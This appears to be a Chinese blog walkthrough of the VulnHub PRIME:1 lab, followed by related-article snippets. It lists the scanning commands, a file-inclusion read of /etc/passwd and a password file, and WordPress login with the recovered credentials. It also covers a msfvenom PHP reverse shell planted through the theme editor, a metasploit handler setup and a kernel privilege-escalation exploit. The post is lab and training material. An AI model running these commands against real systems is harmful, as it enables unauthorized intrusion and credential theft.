【vulnhub靶场】PRIME:1打靶过程记录

2023-10-27

最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。

PRIME:1靶机下载链接

Prime: 1

环境准备

安装Kali系统

安装方法请参考这篇文章https://blog.csdn.net/m0_55754984/article/details/119177156

把靶机导入到 VMware

1、把下载的Prime靶机,解压后导入到VMware中,网络适配器选择NAT,Kali的系统的也做同样的配置。
在这里插入图片描述

怎么拿到靶机的IP

1、首先查看kali的IP地址,如下:
在这里插入图片描述

2、由于靶机和Kali处于同一网络,所以通过扫描192.168.37.0/24这个C段的网络。即可找出靶机的IP.
image.png
拿到了靶机的IP了,接着需要发现靶机上开启了那些服务。

怎么发现服务

服务和端口是一一对应的,所以,我们可以通过端口扫描进行服务的发现。执行下面的命令进行端口扫描

nmap -sS -sV -p- -T5 192.168.37.129

执行完成,返回如下图:
在这里插入图片描述

通过观察上述结果,发现靶机开启了ssh服务和web服务。接着,我们在浏览器访问web服务看能得到什么信息。
image.png

通过查看web源码也没有发现,有用的信息。下一步,我们对网站的目录进行深入的挖掘。

目录扫描

目录扫描常用的工具是dirb,这个工具是kali自带的,执行如下命令进行目录的扫描

dirb http://192.168.37.129/

扫描的结果如下:
在这里插入图片描述

通过观察上述结果,发现几个可疑的目录,我逐一进行访问,看看能不能得到有用的信息。
访问http://192.168.37.129/dev,得到如下的调戏的话:

hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

大概的意思就是:现在你处于0级阶段,在现实生活中,我们应该使用我们的工具在网络上非常努力地挖掘。 快乐的黑客。

访问wordpress,出现一个简单博客页面,没有什么特别有用的信息。我们在进一步扫描,通过指定一些后缀进行扫描。执行如下的命令

dirb http://192.168.37.129/ -X .txt,.php,.zip

得到如下的结果:
在这里插入图片描述

通过观察上述的结果,发现三个可疑的目录,其中secret.txt,太可疑了,进行对它的访问,得到如下的内容:
在这里插入图片描述

得到提示信息:

  1. 对于php文件做更多的fuzz,找到正确的参数parameter
  2. 可以使用fuzz工具,比如git的:Fuzz_For_Web
  3. 如果还是卡在这一步,去学学OSCP(Offensive Security Certified Professional)以Kali Linux 实际操作为主要内容的考试
  4. 如果找到location.txt的位置,就知道下一步怎么做(先记住它,后面会用到)

Fuuz获得参数

测试index.php的参数,执行如下命令

 wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   http://192.168.37.129/index.php?FUZZ

结果如下:
在这里插入图片描述

过滤12个Word的结果,执行如下命令:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12  http://192.168.37.129/index.php?FUZZ

执行结果如下:
image.png

根据上面的提示有个文件location.txt 访问 curl http://192.168.37.129/index.php?file=location.txt
得到如下图的结果:
在这里插入图片描述

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息。

通过访问curl http://192.168.37.129/image.php?secrettier360=/etc/passwd,得到如下信息:
在这里插入图片描述

通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个链接curl http://192.168.37.129/image.php?secrettier360=/home/saket/password.txt。得如下的信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/img_convert/758dff8a8acf8402a9afb38d4d29aa8b.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=149&id=ua0f04a20&margin=%5Bobject%20Object%5D&name=image.png&originHeight=149&originWidth=748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=14161&status=done&style=none&taskId=ubd39509c-43bb-4997-8e26-1f5cf0ad682&title=&width=748#pic_center
发现了密码是:follow_the_ippsec

wordpress漏洞利用

现在有了密码,但是没有用户名,可以通过wpsan进行扫描用户名,执行如下的命令:

wpscan --url http://192.168.37.129/wordpress/ --enumerate u

得到如下的结果:
在这里插入图片描述
发现了用户名victor。尝试用victor和follow_the_ippsec登录到wordpress的后台。发现能成功登录进入了。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。
在这里插入图片描述

生成php反弹shell

通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell
生成反弹shell命令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=7777 -o shell.php

生成的代码直接更新到secret.php中。
在这里插入图片描述

删掉/*,写入生成的shell

配置metasploit

在kali主机上启动msfconsole,并执行 use exploit/multi/handler如下图:
在这里插入图片描述

配置 payload参数,执行如下命令:

set payload php/meterpreter/reverse_tcp

改参数要与生成反弹shell的保持一致(php/meterpreter/reverse_tcp)

配置监听的主机IP和端口号,执行的代码如下:

set lhost 192.168.37.128
set lport 7777

这两个参数也是要和反弹shell的一一对应的。
在这里插入图片描述

执行exploit启动监听操作, 访问 http://192.168.37.19/wordpress/wp-content/themes/twentynineteen/secret.php成功反弹shell
在这里插入图片描述

成功进入shell之后,通过getuid发现用户是www-data,基本上没有什么权限。下一步进行提取操作。

提取

提取之前首先查看系统是什么版本,存在什么漏洞可以利用的。通过执行sysinfo命令查看系统版本信息,如下图:
image.png

通过观察上述结果发现,系统是Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu。执行msfconsole执行searchsploit 16.04 Ubuntu,结果如下:
在这里插入图片描述

由于靶机的内核版本是4.10.0-28,所以采用45010.c这个文件进行提权操作。先把45010.c
/usr/share/exploitdb/exploits/linux/local/拷贝的root目录下进行编译。如下图:
在这里插入图片描述

把提权文件上传到靶机的/tmp目录下,如下图:
在这里插入图片描述

给45010文件赋予执行的权限,并执行。如下图:
在这里插入图片描述

注意:一定要进入交互shell才给45010修改权限和执行操作。执行shell之后,可以通过python -c "import pty;pty.spawn('/bin/bash');"获取整个交互shell。

规避漏洞风险

wp禁止主题编辑操作,通过在wp-config.php中,把define(‘DISALLOW_FILE_EDIT’,true)

参考资料:
prime1-笔记-无涯.pdf

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

【vulnhub靶场】PRIME:1打靶过程记录 的相关文章

  • 线程安全(中)--彻底搞懂synchronized(从偏向锁到重量级锁)

    接触过线程安全的同学想必都使用过synchronized这个关键字 在java同步代码快中 synchronized的使用方式无非有两个 通过对一个对象进行加锁来实现同步 如下面代码 synchronized lockObject 代码 对
  • 前端必备的 web 安全知识手记

    前言 安全这种东西就是不发生则已 一发生则惊人 作为前端 平时对这方面的知识没啥研究 最近了解了下 特此沉淀 文章内容包括以下几个典型的 web 安全知识点 XSS CSRF 点击劫持 SQL 注入和上传问题等 下文以小王代指攻击者 话不多
  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受
  • 2024年金三银四网络安全考试试题

    2023年金三银四网络安全考试试题 1 关于数据使用说法错误的是 A 在知识分享 案例中如涉及客户网络数据 应取敏感化 不得直接使用 B 在公开场合 公共媒体等谈论 传播或发布客户网络中的数据 需获得客户书面授权或取敏感化 公开渠道获得的除
  • 200道网络安全常见面试题合集(附答案解析+配套资料)

    有不少小伙伴面临跳槽或者找工作 本文总结了常见的安全岗位面试题 方便各位复习 祝各位事业顺利 财运亨通 在网络安全的道路上越走越远 所有的资料都整理成了PDF 面试题和答案将会持续更新 因为无论如何也不可能覆盖所有的面试题 php爆绝对路径
  • 远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_raylink todesk

    目录 一 前言 二 远程控制中的安全威胁 三 国内外远控软件安全机制 ToDesk RayLink Teamviewer Splashtop 四 安全远控预防 一 前言 近期 远程控制话题再一次引起关注 据相关新闻报道 不少不法分子利用远程
  • 小白入门黑客之渗透测试(超详细)基本流程(内附工具)

    经常会收到小伙伴们这样的私信 为什么我总是挖不到漏洞呢 渗透到底是什么样的流程呢 所以全网最详细的渗透测试流程来了 渗透测试其实就是通过一些手段来找到网站 APP 网络服务 软件 服务器等网络设备和应用的漏洞 告诉管理员有哪些漏洞 怎么填补
  • socket网络编程几大模型?看看CHAT是如何回复的?

    CHAT回复 网络编程中常见的有以下几种模型 1 阻塞I O模型 Blocking I O 传统的同步I O模型 一次只处理一个请求 2 非阻塞I O模型 Non blocking I O 应用程序轮询调用socket相关函数检查请求 不需
  • 基于java的物业管理系统设计与实现

    基于java的物业管理系统设计与实现 I 引言 A 研究背景和动机 物业管理系统是指对物业进行管理和服务的系统 该系统需要具备对物业信息 人员信息 财务信息等进行管理的能力 基于Java的物业管理系统设计与实现的研究背景和动机主要体现在以下
  • 网络安全(黑客)自学

    1 网络安全是什么 网络安全可以基于攻击和防御视角来分类 我们经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 2 网络安全市场 一 是市场需求量高 二 则是发展相对成熟入门比较容易 3 所需要的
  • 网络安全基础知识面试题库

    1 基于路由器的攻击手段 1 1 源IP地址欺骗式攻击 入侵者从外部传输一个伪装成来自内部主机的数据包 数据包的IP是 内网的合法IP 对策 丢弃所有来自路由器外端口 却使用内部源地址的数据包 1 2 源路由攻击 入侵者让数据包循着一个不可
  • 数据加密保障数据安全

    一 目标 1 1 预研需求 数据加密是安全领域中常用的安全措施 它们的主要作用是保护数据的机密性和完整性 以防止未经授权的访问 窃取 篡改或泄漏敏感信息 数据传输加密 保护敏感数据在传输过程中的安全 当数据通过网络传输时 它们可能会经过多个
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一 CS反向连接上线 拿下Win2008 一 使用转发代理上线创建监听器 二 上传后门执行上线 隧道技术 SMB协议 SMB协议介绍
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至
  • 【安全】Java幂等性校验解决重复点击(6种实现方式)

    目录 一 简介 1 1 什么是幂等 1 2 为什么需要幂等性 1 3 接口超时 应该如何处理 1 4 幂等性对系统的影响 二 Restful API 接口的幂等性 三 实现方式 3 1 数据库层面 主键 唯一索引冲突 3 2 数据库层面 乐
  • 2023下半年软考「单独划线」合格标准公布

    中国计算机技术职业资格网发布了 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告 2023下半年软考单独划线地区合格标准各科目均为42分 01 官方通告 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告
  • 【安全-SSH】SSH安全设置

    今天发现自己的公有云服务器被攻击了 在这里插入图片描述 https img blog csdnimg cn direct cafdca04646f4b8b838400ec79ac282f png 然后查看了登录日志 如上图 ls sh va
  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全
  • 网络安全行业热门认证证书合集

    网络安全认证证书 就和学历一样是敲门砖 拿到了可以用不到 但不能没有 技术大牛可以没有证书 但普通人不能没有 1 初级入门 就像学历在职场上展示一个人的基本素养一样 网络安全认证证书可以展示一个人在网络安全领域具备的基本知识和技能 它为初学

随机推荐

  • SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)

    SQL注入 sqli labs 一个实验平台 里面有完整的SQL注入课程 需要phpstudy环境 因此先安装phpstudy环境 phpstudy https www xp cn 安装后发现数据库和我本机的数据库出现冲突了 只能使用 sc
  • iOS进阶_密码学进阶(二.对称加密算法代码演练)

    对称加密算法代码演练 终端测试指令 DES ECB 加密 echo n hello openssl enc des ecb K 616263 nosalt base64 DES CBC 加密 echo n hello openssl enc
  • 本机往服务器传文件,本机向windows服务器传输文件的三种方法

    闲来无事 在腾讯云上申请了一个免费的服务器 想将自己写的网页发布到服务器上 服务器的申请很简单 百度搜索 腾讯云 然后新人第一次注册能申请到免费一个月的云主机 虽然配置不怎么高 但是还是能用的 这是我申请到一个云主机 那么如何将我们本机的文
  • 学习html+css+js笔记

    初学html css js笔记 一 html基本格式 特殊符号 1 html基本格式 标签html head body title 2 特殊符号 3 小作业 白居易介绍 标签h1 h6 p hr img video 二 导航标签 表格标签
  • js改变css样式_CSS 知识总结

    css基本概念 css的历史 css的发明者 发明html的李爵士的同时赖先生 Hakon Wium Lie CSS2 1 是使用最广泛的版本 IE支持 CSS 3 现代版本 分模块 IE8部分支持 css层叠样式表 可以多次对已有的样式进
  • Vue.js 结合bootstrap 前端实现分页效果

    Vue js 结合bootstrap 前端实现分页和排序效果 写之前先抱怨几句 本来一心一意做 net开发的 渐渐地成了只做前端 最近项目基本都用java做后台 我们这些 net的就成了前端 不是用wpf做界面 就是用html写web页面
  • 李宏毅机器学习笔记:RNN循环神经网络

    RNN 一 RNN 1 场景引入 2 如何将一个单词表示成一个向量 3种典型的RNN网络结构 二 LSTM LSTM和普通NN RNN区别 三 RNN的训练 RNN与auto encoder和decoder 四 RNN和结构学习的区别 五
  • TensorFlow 之 tf.gfile函数

    这些函数和python中的os模块非常的相似 一般都可以用os模块代替 文章目录 1 tf gfile Copy oldpath newpath overwrite False 2 tf gfile MkDir dirname 3 tf g
  • java - 标准类生成(无参、带参构造方法创建对象)

    public class Animal private String name 成员变量 private int age 成员变量 public Animal 无参构造方法 public Animal String name int age
  • Linux判断文件存储移动磁盘的方法

    Linux判断文件存储移动磁盘的方法 一 文件位置 二 磁盘信息 方法一 三 设备属性 方法二 四 磁盘链接 方法三 仅限USB 一 文件位置 通过df h file获取块设备文件存放位置sdb4 sudo fdisk l获取sdb4在 d
  • “有本事你去学校数据库把期末成绩改了“,“好,你等着。“

    作者主页 士别三日wyx 作者简介 CSDN top100 阿里云博客专家 华为云享专家 网络安全领域优质创作者 专栏简介 此文章已录入专栏 网络安全快速入门 前几天 有个粉丝找到我 说是跟同学吹牛逼 要改学校数据库的期末成绩 问我有没有什
  • qt里button相关

    ui gt stop gt setEnabled false 设置按键是否可用 ui gt button gt setIcon QIcon ico stop ico 按钮图标 ui gt button gt setIconSize QSiz
  • mysql外键约束怎么写_mysql外键约束怎么写

    mysql外键约束的写法 CONSTRAINT FOREIGN KEY 字段名 REFERENCES 主键列1 外键约束是表的一个特殊字段 经常与主键约束一起使用 在 CREATE TABLE 语句中 通过 FOREIGN KEY 关键字来
  • 最新出炉 -Web自动化测试之playwright:概述

    playwright是由微软开发的Web UI自动化测试工具 支持Node js Python C 和 Java语言 本文将介绍playwright的特性以及它的简单使用 目录 目录 Web自动化测试之playwright 概述 playw
  • python+stomp+activemq

    python也可以连接MQ 以ActiveMQ为例 安装stomp py https github com jasonrbriggs stomp py 下载后安装 python setup py install 很简单 然后一个简单的示例
  • 【视频编码学习】H.266/VVC参考软件VTM配置运行(VTM-6.0版本)

    运行环境 软件版本等说明 VTM 6 0版本 操作系统 Win10 64位操作系统 IDE Visual Studio 2017 编译器 Cmake 1 VTM下载地址 https vcgit hhi fraunhofer de jvet
  • 【Kaggle】Stable Diffusion 竞赛(包的管理和下载)

    一 包的集中管理 首先建立一个新的文件 例如我的是 wheels timm 用来管理第三方包 pip wheel safetensors 0 3 1 pip wheel timm 0 8 17 dev0
  • 百度地图WEB服务-逆地理编码使用心得

    百度地图WEB服务 逆地理编码使用心得 逆地理编码接口 Postman接口请求测试 POI信息召回 Postman接口请求测试 上一篇博文写了我开发项目中最长用的正地理编码接口的博文 这次想总结一下逆地理编码的使用情况 当我们请求百度地图W
  • 高基数类别特征预处理:平均数编码

    一 前言 对于一个类别特征 如果这个特征的取值非常多 则称它为高基数 high cardinality 类别特征 在深度学习场景中 对于类别特征我们一般采用Embedding的方式 通过预训练或直接训练的方式将类别特征值编码成向量 在经典机
  • 【vulnhub靶场】PRIME:1打靶过程记录

    最近发现一个很有趣的靶场集合 里面涵盖了一些基本的漏洞 我们通过漏洞复现 了解一些网络安全的一些基本操作 PRIME 1靶机下载链接 Prime 1 环境准备 安装Kali系统 安装方法请参考这篇文章https blog csdn net